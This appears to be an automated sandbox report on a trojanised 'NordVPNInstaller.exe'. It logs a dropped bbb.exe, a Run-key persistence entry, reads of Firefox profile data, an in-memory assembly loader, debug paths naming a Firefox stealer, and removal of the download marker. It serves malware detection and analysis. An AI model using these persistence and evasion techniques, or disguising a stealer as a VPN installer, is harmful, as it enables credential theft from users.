Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\4b0e4149-cae4-4d92-95df-7ed46049df32

Source: NordVPNInstaller.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: NordVPNInstaller.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NordVPNInstaller.exe	ReversingLabs: Detection: 63%
Source: NordVPNInstaller.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

File read: C:\Users\user\Desktop\NordVPNInstaller.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\NordVPNInstaller.exe "C:\Users\user\Desktop\NordVPNInstaller.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\bbb\bbb.exe "C:\Users\user\AppData\Roaming\bbb\bbb.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\bbb\bbb.exe "C:\Users\user\AppData\Roaming\bbb\bbb.exe"
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 12572
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 12576
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 12572	Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Section loaded: fwpuclnt.dll

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: NordVPNInstaller.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: NordVPNInstaller.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: NordVPNInstaller.exe, bbb.exe.0.dr
Source:	Binary string: r\VB.net\stealers\firefoxx64\firefox\obj\Debug\firefox.pdb source: NordVPNInstaller.exe, bbb.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: NordVPNInstaller.exe, DJW.cs	.Net Code: FG System.Reflection.Assembly.Load(byte[])
Source: bbb.exe.0.dr, DJW.cs	.Net Code: FG System.Reflection.Assembly.Load(byte[])

Source: bbb.exe.0.dr	Static PE information: real checksum: 0x48848 should be: 0x532b0
Source: NordVPNInstaller.exe	Static PE information: real checksum: 0x48848 should be: 0x532b0

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Code function: 0_2_065915A8 pushad ; retf

0_2_065915F9

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

File created: C:\Users\user\AppData\Roaming\bbb\bbb.exe

Jump to dropped file

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyOtApp			Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyOtApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	File opened: C:\Users\user\AppData\Roaming\bbb\bbb.exe:Zone.Identifier read attributes \| delete			Jump to behavior
